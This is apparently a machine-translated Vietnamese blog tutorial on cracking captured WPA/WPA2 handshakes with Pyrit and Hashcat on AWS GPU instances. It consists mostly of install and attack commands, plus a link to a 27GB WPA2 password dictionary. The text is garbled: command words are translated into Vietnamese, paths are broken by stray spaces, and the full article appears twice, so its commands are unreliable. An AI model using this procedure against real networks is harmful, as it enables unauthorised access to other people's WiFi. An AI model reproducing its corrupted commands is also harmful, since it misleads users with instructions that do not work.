BẺ KHÓA WPA / WPA2 VỚI GPU TRÊN AWS
DISCLAIMER: Thông tin được cung cấp trên bài này là để được sử dụng cho các mục đích giáo dục. Tác giả trang web là không có cách nào chịu trách nhiệm về bất kỳ sự lạm dụng của các thông tin được cung cấp. Tất cả các thông tin trong trang web này là có nghĩa là để giúp người đọc phát triển một thái độ phòng chống hacker nhằm ngăn chặn các cuộc tấn công được thảo luận. Trong không có cách nào bạn nên sử dụng các thông tin để gây ra bất kỳ loại thiệt hại trực tiếp hoặc gián tiếp. Bạn thực hiện các thông tin cung cấp có nguy cơ của riêng bạn.
Trong bài này chúng ta sẽ nhận ra thực tế nó là để thực hiện một cuộc tấn công bạo lực trên WPA hoặc WPA2 bắt cái bắt tay. Một vài năm trước đây WPA / WPA2 được coi là an toàn nhưng với sức mạnh hiện tại và chi phí của đám mây bất cứ ai có chút thiết lập quan tâm can một máy chủ siêu nhanh cho những nỗ lực sức mạnh vũ phu với giá rất rẻ máy tính (thấp nhất là $ 0.6 mỗi giờ!).
Tôi sẽ đi bộ qua thử nghiệm của tôi và chia sẻ các chi tiết và kết quả với bạn. Có hàng tá các hướng dẫn cho ra này đó, nhưng điều này chỉ là thử nghiệm nhỏ của riêng tôi.
Brute buộc một WPA hoặc WPA2 mật khẩu bắt đầu bằng những cái bắt tay chụp 4way của WiFi mục tiêu. Tôi sẽ không đến đó là bạn có thể tìm thấy rất nhiều các giải pháp cho điều đó! Tôi chỉ có thể đề cập đến Kali hộp công cụ cung cấp cho bạn các công cụ. Vì vậy, chúng tôi sẽ cho bạn có những cái bắt tay 4way WPA trong tập tin handshake.cap.
Nvidia, đã cung cấp một Amazon Linux AMI với trình điều khiển NVIDIA GRID GPU cài đặt. Tôi sử dụng một g2.8xlarge mà đi kèm với lõi GPU 4GRID, 32 CPU và bộ nhớ RAM 60GB. Nó chi phí cho tôi $ 2,6 giờ trong khu vực Oregon.
Một khi bạn đang thực hiện với tung ra các ví dụ, bạn SSH và cài đặt các gói phụ thuộc sau đây:
0
sudo yum install python-devel openssl-devel zlib-devel libpcap-devel glibc-devel gcc làm
Sau đó, chúng tôi có được để cài đặt các công cụ cần thiết. Có 2 công cụ hiệu suất cao cho brute buộc được biết đến như Pyrit và Hashcat. Pyrit được thiết kế cho brute buộc WPA băm / WPA2 trong khi Hashcat là một công cụ tổng quát hơn. Hiệu suất phụ thuộc vào yêu cầu của môi trường của bạn, nhưng sở thích cá nhân của tôi là Pyrit! Cả hai công cụ có các gói khác nhau cho các hệ thống CUDA kích hoạt.
Còn có một tên cụ Scapy cung cấp một số chức năng cho giao thức WPA / WPA2. Scapy không được sử dụng ở đây nhưng tôi vừa mô tả quá trình cài đặt.
Pyrit (generic):
Pyrit (generic):
0
wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/pyrit/pyrit-0.4.0.tar.gz
1
tar xvzf pyrit-0.4.0.tar.gz
2
cd pyrit-0.4.0
3
python setup.py xây dựng
4
python setup.py cài đặt
Pyrit (CUDA):
0
wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/pyrit/cpyrit-cuda-0.4.0.tar.gz
1
tar xvzf cpyrit-CUDA-0.4.0.tar.gz
2
cd cpyrit-CUDA-0.4.0
3
vi setup.py
0
NVIDIA_INC_DIRS = [ '/ opt / nvidia / CUDA / include']
0
python setup.py xây dựng
1
python setup.py cài đặt
2
ln -s / usr / local / bin / pyrit / usr / bin / pyrit
3
pyrit chuẩn
scapy:
0
wget http://www.secdev.org/projects/scapy/files/scapy-latest.zip
1
unzip scapy-latest.zip -d scapy
2
cd scapy / * /
3
python setup.py xây dựng
4
python setup.py cài đặt
5
ln -s / usr / local / bin / scapy / usr / bin / scapy
Để sử dụng Pyrit bạn có tùy chọn để nhập mật khẩu và ESSID và để cho các Pyrit chạy một lô chống lại tất cả ESSID: PASSWORD;
0
pyrit import_passwords điển-file-i
1
pyrit eval
2
pyrit -e 'target_essid' create_essid
3
hàng loạt pyrit
hoặc chỉ cần chạy ESSID chống lại một danh sách mật khẩu:
0
pyrit -r handshake.cap.cap -o dải sạch handshake.cap
1
pyrit -r sạch handshake.cap -i điển-file attack_passthrough
Bạn có thể tìm thêm thông tin về Pyrit ĐÂY. Trong trường hợp bạn đang quan tâm Hashcat sau đó bạn có thể kiểm tra ĐÂY.
Điều cuối cùng để chia sẻ là từ điển (danh từ). Có gigabyte từ điển lên đó, nhưng họ có thể không được xử lý. Các mật khẩu WPA / WPA2 là tối thiểu 8 ký tự như vậy Pyrit hiện một ít chế biến để làm cho từ điển hiệu quả nhất.
Tôi sẽ chia sẻ một liên kết (nhưng một lần nữa như tôi đề cập ở chối trách nhiệm, tôi chỉ chia sẻ thông tin. Bạn hoàn toàn chịu trách nhiệm về cách bạn sử dụng nó.) Với 3902508361 mật khẩu WPA2 độc đáo ĐÂY (27GB)
* Nếu bạn sử dụng megatools bạn có thể làm như sau (chắc chắn rằng nó là mega.co.nz và nháy đơn xung quanh liên kết):
0
./megadl 'https://mega.co.nz/#F!vhNkjSoY!Ti5EwbjCNQjm-c_nL54rAQ'
Giải nén nó với
0
tar xvd dic.tar.gz
Sau khi thực hiện, bạn có thể di chuyển các thư mục mật khẩu vào đường dẫn này:
~ / .pyrit / Blobspace /
Và chạy "pyrit eval" để xác nhận mật khẩu đang sử dụng.
----
Để sử dụng Hashcat bạn có thể cài đặt nó như sau:
Hashcat (CUDA)
0
rpm -i http://pkgs.repoforge.org/p7zip/p7zip-9.20.1-1.el7.rf.x86_64.rpm
1
wget http://hashcat.net/files/cudaHashcat-2.01.7z
2
7za x cudaHashcat-2.01.7z
3
cd cudaHashcat-2.01
4
./cudaHashcat64.bin -b -m 2500
và để chuyển đổi các tập tin nắp để có thể đọc được hccap bạn nên sử dụng Aircrack-ng. Bạn có thể tải về nó như sau:
0
yum install -y git-svn libpcap-devel sql-devel gcc gcc-c ++ libnl-devel openssl-devel usbutils pciutils rfkill wireless-tools glibc *
1
2
wget http://download.aircrack-ng.org/aircrack-ng-1.2-rc4.tar.gz
3
tar xvfz aircrack-ng-1.2-rc4.tar.gz
4
cd aircrack-ng-1.2-rc4
5
chế tạo
6
thực hiện cài đặt
7
ln -s /path_to_aircrack/aircrack-ng-1.2-rc4/src/aircrack-ng / usr / bin / Aircrack-ng
Sau khi cài đặt bạn có thể chuyển đổi các tập tin và chạy hashcat:
0
Aircrack-ng file.cap -J file.hccap
1
/path_to_hashcat/oclHashcat64.exe -m 2500 file.hccap words.dic
Bạn cũng có thể chạy một cuộc tấn công bruteforce với sự kết hợp tùy chỉnh:
0
/path_to_hashcat/oclHashcat64.exe -m 2500 -a3 file.hccap? d? d? d? d? d? d? d? d
XỬ LÝ SỰ CỐ:
>>> ERROR: cuModuleLoad () 301
*** Chỉ cần chạy các lệnh bên trong thư mục hashcat để các nguồn lực có thể truy cập
http://www.mylogs.online/2016/01/05/wpawpa2-cracking-with-gpu-in-aws/
Trong bài này chúng ta sẽ nhận ra thực tế nó là để thực hiện một cuộc tấn công bạo lực trên WPA hoặc WPA2 bắt cái bắt tay. Một vài năm trước đây WPA / WPA2 được coi là an toàn nhưng với sức mạnh hiện tại và chi phí của đám mây bất cứ ai có chút thiết lập quan tâm can một máy chủ siêu nhanh cho những nỗ lực sức mạnh vũ phu với giá rất rẻ máy tính (thấp nhất là $ 0.6 mỗi giờ!).
Tôi sẽ đi bộ qua thử nghiệm của tôi và chia sẻ các chi tiết và kết quả với bạn. Có hàng tá các hướng dẫn cho ra này đó, nhưng điều này chỉ là thử nghiệm nhỏ của riêng tôi.
Brute buộc một WPA hoặc WPA2 mật khẩu bắt đầu bằng những cái bắt tay chụp 4way của WiFi mục tiêu. Tôi sẽ không đến đó là bạn có thể tìm thấy rất nhiều các giải pháp cho điều đó! Tôi chỉ có thể đề cập đến Kali hộp công cụ cung cấp cho bạn các công cụ. Vì vậy, chúng tôi sẽ cho bạn có những cái bắt tay 4way WPA trong tập tin handshake.cap.
Nvidia, đã cung cấp một Amazon Linux AMI với trình điều khiển NVIDIA GRID GPU cài đặt. Tôi sử dụng một g2.8xlarge mà đi kèm với lõi GPU 4GRID, 32 CPU và bộ nhớ RAM 60GB. Nó chi phí cho tôi $ 2,6 giờ trong khu vực Oregon.
Một khi bạn đang thực hiện với tung ra các ví dụ, bạn SSH và cài đặt các gói phụ thuộc sau đây:
0
sudo yum install python-devel openssl-devel zlib-devel libpcap-devel glibc-devel gcc làm
Sau đó, chúng tôi có được để cài đặt các công cụ cần thiết. Có 2 công cụ hiệu suất cao cho brute buộc được biết đến như Pyrit và Hashcat. Pyrit được thiết kế cho brute buộc WPA băm / WPA2 trong khi Hashcat là một công cụ tổng quát hơn. Hiệu suất phụ thuộc vào yêu cầu của môi trường của bạn, nhưng sở thích cá nhân của tôi là Pyrit! Cả hai công cụ có các gói khác nhau cho các hệ thống CUDA kích hoạt.
Còn có một tên cụ Scapy cung cấp một số chức năng cho giao thức WPA / WPA2. Scapy không được sử dụng ở đây nhưng tôi vừa mô tả quá trình cài đặt.
Pyrit (generic):
Pyrit (generic):
0
wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/pyrit/pyrit-0.4.0.tar.gz
1
tar xvzf pyrit-0.4.0.tar.gz
2
cd pyrit-0.4.0
3
python setup.py xây dựng
4
python setup.py cài đặt
Pyrit (CUDA):
0
wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/pyrit/cpyrit-cuda-0.4.0.tar.gz
1
tar xvzf cpyrit-CUDA-0.4.0.tar.gz
2
cd cpyrit-CUDA-0.4.0
3
vi setup.py
0
NVIDIA_INC_DIRS = [ '/ opt / nvidia / CUDA / include']
0
python setup.py xây dựng
1
python setup.py cài đặt
2
ln -s / usr / local / bin / pyrit / usr / bin / pyrit
3
pyrit chuẩn
scapy:
0
wget http://www.secdev.org/projects/scapy/files/scapy-latest.zip
1
unzip scapy-latest.zip -d scapy
2
cd scapy / * /
3
python setup.py xây dựng
4
python setup.py cài đặt
5
ln -s / usr / local / bin / scapy / usr / bin / scapy
Để sử dụng Pyrit bạn có tùy chọn để nhập mật khẩu và ESSID và để cho các Pyrit chạy một lô chống lại tất cả ESSID: PASSWORD;
0
pyrit import_passwords điển-file-i
1
pyrit eval
2
pyrit -e 'target_essid' create_essid
3
hàng loạt pyrit
hoặc chỉ cần chạy ESSID chống lại một danh sách mật khẩu:
0
pyrit -r handshake.cap.cap -o dải sạch handshake.cap
1
pyrit -r sạch handshake.cap -i điển-file attack_passthrough
Bạn có thể tìm thêm thông tin về Pyrit ĐÂY. Trong trường hợp bạn đang quan tâm Hashcat sau đó bạn có thể kiểm tra ĐÂY.
Điều cuối cùng để chia sẻ là từ điển (danh từ). Có gigabyte từ điển lên đó, nhưng họ có thể không được xử lý. Các mật khẩu WPA / WPA2 là tối thiểu 8 ký tự như vậy Pyrit hiện một ít chế biến để làm cho từ điển hiệu quả nhất.
Tôi sẽ chia sẻ một liên kết (nhưng một lần nữa như tôi đề cập ở chối trách nhiệm, tôi chỉ chia sẻ thông tin. Bạn hoàn toàn chịu trách nhiệm về cách bạn sử dụng nó.) Với 3902508361 mật khẩu WPA2 độc đáo ĐÂY (27GB)
* Nếu bạn sử dụng megatools bạn có thể làm như sau (chắc chắn rằng nó là mega.co.nz và nháy đơn xung quanh liên kết):
0
./megadl 'https://mega.co.nz/#F!vhNkjSoY!Ti5EwbjCNQjm-c_nL54rAQ'
Giải nén nó với
0
tar xvd dic.tar.gz
Sau khi thực hiện, bạn có thể di chuyển các thư mục mật khẩu vào đường dẫn này:
~ / .pyrit / Blobspace /
Và chạy "pyrit eval" để xác nhận mật khẩu đang sử dụng.
----
Để sử dụng Hashcat bạn có thể cài đặt nó như sau:
Hashcat (CUDA)
0
rpm -i http://pkgs.repoforge.org/p7zip/p7zip-9.20.1-1.el7.rf.x86_64.rpm
1
wget http://hashcat.net/files/cudaHashcat-2.01.7z
2
7za x cudaHashcat-2.01.7z
3
cd cudaHashcat-2.01
4
./cudaHashcat64.bin -b -m 2500
và để chuyển đổi các tập tin nắp để có thể đọc được hccap bạn nên sử dụng Aircrack-ng. Bạn có thể tải về nó như sau:
0
yum install -y git-svn libpcap-devel sql-devel gcc gcc-c ++ libnl-devel openssl-devel usbutils pciutils rfkill wireless-tools glibc *
1
2
wget http://download.aircrack-ng.org/aircrack-ng-1.2-rc4.tar.gz
3
tar xvfz aircrack-ng-1.2-rc4.tar.gz
4
cd aircrack-ng-1.2-rc4
5
chế tạo
6
thực hiện cài đặt
7
ln -s /path_to_aircrack/aircrack-ng-1.2-rc4/src/aircrack-ng / usr / bin / Aircrack-ng
Sau khi cài đặt bạn có thể chuyển đổi các tập tin và chạy hashcat:
0
Aircrack-ng file.cap -J file.hccap
1
/path_to_hashcat/oclHashcat64.exe -m 2500 file.hccap words.dic
Bạn cũng có thể chạy một cuộc tấn công bruteforce với sự kết hợp tùy chỉnh:
0
/path_to_hashcat/oclHashcat64.exe -m 2500 -a3 file.hccap? d? d? d? d? d? d? d? d
XỬ LÝ SỰ CỐ:
>>> ERROR: cuModuleLoad () 301
*** Chỉ cần chạy các lệnh bên trong thư mục hashcat để các nguồn lực có thể truy cập
http://www.mylogs.online/2016/01/05/wpawpa2-cracking-with-gpu-in-aws/
Comments
Post a Comment